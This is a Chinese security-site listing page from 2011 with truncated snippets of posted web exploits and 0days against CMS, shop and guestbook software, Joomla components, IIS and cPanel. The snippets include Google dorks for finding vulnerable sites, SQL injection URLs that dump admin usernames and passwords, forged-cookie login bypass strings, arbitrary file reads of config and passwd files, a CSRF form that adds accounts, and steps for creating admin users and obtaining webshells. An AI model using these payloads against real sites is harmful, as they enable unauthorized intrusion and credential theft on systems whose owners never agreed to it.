Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

绿色网站无广告
搜索:
您的位置: Linux安全网 > Linux安全 >
  • Linux安全# 快捷留言簿 v10.09 漏洞
  • 日期:2011-07-22 点击:198发布作者:未知 影响版本:快捷留言簿 v10.09 漏洞描述: 上传漏洞: 漏洞页面:/up/add.asp 利用方法:直接在留言本后面加个漏洞页面地址:譬如: Cookie欺骗漏洞: 漏洞页面:/up/admin_main.asp,图片列表/up/admin_list.asp 也可以传完了直接看页面源码
  • Linux安全# TRS WCM文件读取漏洞
  • 日期:2011-07-22 点击:257标题:TRS WCM文件读取漏洞 来源:马骏's blog 风险等级:高 影响版本:全版本 漏洞描述: trs wcm的某个文件.filename未过过滤.能直接写出任意文件.通过类似c:/boot.ini或者../../passwd等组合可以下载敏感文件。 0---------------------------------------
  • Linux安全# 讯时系统通杀漏洞0day
  • 日期:2011-07-22 点击:201利用cokiess欺骗进管理后台,google关键字inurl:news_more.asp?lm2= 1. /admin/admin_news_pl_view.asp?id=1 //id任意 填入以下语句 2. 有时1显示错误信息的时候继续往后退2,3,4。。。。 3. |'+dfirst([user],[admin])+chr(124)+dfirst([pass],[admin]),use
  • Linux安全# phpcms系统漏洞
  • 日期:2011-07-22 点击:202PHPCMS系统adsclass.phpSQL注入漏洞 作者:Unknow 影响版本: phpcms 2008sp4_UTF8_100510 程序介绍: Phpcms是一款基于PHP+Mysql架构的网站内容管理系统,也是一个开源的PHP开发平台。Phpcms采用模块化方式开发,功能易用便于扩展,可面向大中型站点提供重量
  • Linux安全# 雅琦科技程序0day
  • 日期:2011-07-22 点击:196作者:Sniff3r lan3a 关键字:inurl:ShowInfo.asp?ShowId= 找到网站后然后在网站地址后加上:admin/User_Manage.asp?action=UserAdd 进去添加一个管理员,然后用添加的账户登录。 /admin/Yqlogin.asp /admin/admin_main.asp 后台拿Webshell有2个方法。 1.在
  • Linux安全# 千博企业网站管理系统 Oday
  • 日期:2011-07-22 点击:198发布日期:2010-04-19 发布作者:Lan3a 影响版本: 全部 漏洞描述: 程序都加入了防注入代码的,在NoSql.asp文件中 % If EnableStopInjection = True Then Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr Fy_In = '|;|and|exec|insert|select|
  • Linux安全# Shopex V4.8.4 V4.8.5 0Day 通杀
  • 日期:2011-07-22 点击:202发布日期:2010-04-22 发布作者:dbgger 影响版本: Shopex V4.8.4 V4.8.5 漏洞描述: 文件过滤不严,导致任意文件读取漏洞。 测试代码: http://www.xxxx.com/shopadmin/index.php?ctl=sfileact=getDBp[0]=../../config/config.php 可以连上数据库. mysql -
  • Linux安全# Joomla com_qpersonel SQL Injection Exploit
  • 日期:2011-07-22 点击:200Joomla com_qpersonel SQL Injection Exploit 作者: Unknow ========================================== joomla com_qpersonel SQL Injection Exploit #!/usr/bin/python #Joomlacom_qpersonelSQLInjectionRemoteExploit #Version1.0(23thMay2010(publicrel
  • Linux安全# Blox CMS SQL注射漏洞
  • 日期:2011-07-22 点击:195Blox CMS SQL Injection Vulnerability # Title: blox CMS SQL Injection Vulnerability # EDB-ID: 12729 # CVE-ID: () # OSVDB-ID: () # Author: CoBRa_21 # Published: 2010-05-24 # Verified: yes # Download Exploit Code # Download N/A --------------
  • Linux安全# 逛街网PHP版系统SQL注入漏洞
  • 日期:2011-07-22 点击:196作者: lucifer 关键字: inurl:reading/article.php EXP: ,2,username,password,5,6,7,8,9,10,11,12%20from%20c_adminhttp://www.xxx.com/reading/article.php?id=-1011%20union%20%20select%201 注意,这次爆出的MD5需要注意下,因为他的加密方式很特殊!
  • Linux安全# oask问答系统 v2.00day
  • 日期:2011-07-22 点击:194发布一个oask问答系统的0day 最新版的哦, 用cookie浏览器强制修改cookie为 引用 oASK; ASPSESSIONIDSSDDBADB=HEJJFJNCEOFFIMOBJGHBPHJB; VSN=078349ef024074d5; oASKADM=ADMUPW=a' or '1'='1ADMUNM=admin' or '1'='1 然后访问 http://xxx.xxx.xxxx/admin/in
  • Linux安全# Joomla eventcal组件1.6.4 盲注漏洞
  • 日期:2011-07-22 点击:203Joomla eventcal组件1.6.4 com_eventcalSQL注入盲注漏洞 CVE: N/A OSVDB-ID: N/A Author: RoAd_KiLlEr Published: 2010-07-03 Verified: No view sourceprint?[~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Contact: RoAd_KiLlEr[at]
  • Linux安全# SHOPXP购物系统 v10.31 注入漏洞 Exp
  • 日期:2011-07-22 点击:199局限性很大,也是后台某个文件没做过滤。 所以啊,很多站改了后台,所以也没用。 EXP: !-- ShopXp_Oday -- !-- inurl:xpCatalog_xpDesc.asp?action_key_order= Or inurl:shopxp_news.asp-- form action= http://127.0.0.1/admin/pinglun.asp?id=1%20and%201=
  • Linux安全# CBA官网网易体育频道
  • 日期:2011-07-22 点击:196CBA官网网易体育频道 貌似进去玩过,但是大牛们一发图,就成膜拜的对象了。 关注国外,好好学习,天天向上........
  • Linux安全# 小红伞长期更新地址
  • 日期:2011-07-22 点击:203中文小红伞长期更新地址: http://dl.antivir.de/down/vdf/ivdf_fusebundle_nt_en.zip 不能更新的下载后启动小红伞手动更新,找到下载的文件, 如果不能选择,直接找到所在目录 copy ivdf_fusebundle_nt_en.zip 文件名就可以了 速度比较快。。。
  • Linux安全# phpaaCms v0.3.1 SQL注入漏洞
  • 日期:2011-07-22 点击:198PHPAA (show.php) 注入漏洞 {注入测试} http://www.xiaoweio.cn/phpaaCMS/show.php?id=-194 union all select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users-- 影响版本:FooSun 5.0 官方地址: http://www.phpaa.cn
  • Linux安全# IIS 高版本源码泄露漏洞+解析漏洞
  • 日期:2011-07-22 点击:201网络转载 本人亲测 危害那是相当大!! From:80sec 漏洞介绍:IIS是微软推出的一款webserver,使用较为广泛,在支持asp/asp.net的同时还可以较好的支持PHP等其他语言的运行。但是80sec发现在IIS的较高版本中存在一个比较严重的安全问题,在按照网络上提供的
  • Linux安全# Cpanel v11.25 CSRF 添加管理员账号exp
  • 日期:2011-07-22 点击:197Cpanel v11.25 CSRF 添加管理员账号漏洞。 Exploite: html body onload=javascript:fireForms() form method=POST name=form0 action= http://server:2082/frontend/x3/ftp/doaddftp.html input type=hidden name=login value=name/ input type=hidden name=
  • Linux安全# DedeCmsV5.6 本地包含又一利用方式
  • 日期:2011-07-22 点击:195文章作者:jannock 续本地包含 include/arc.datalist.class.php $codefile = (isset($needCode) ? $needCode : $cfg_soft_lang); if(file_exists(DEDEINC.'/code/datalist.'.$codefile.'.inc')) { require_once(DEDEINC.'/code/datalist.'.$codefile.'.inc')
  • Linux安全# PhpCMS一个漏洞的二次利用
  • 日期:2011-07-22 点击:200PhpCMS一个漏洞的二次利用 作者: Flyh4t php CMS历来以漏洞多著称,其2008版本继承了之前版本的光荣传统,存在各种危害程度不同的漏洞。下面我们来看一个已经在后期更新中补掉的本地文件 包含 漏洞,但是该漏洞的利用方式还是比较有意思的。 漏洞代码很简单
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史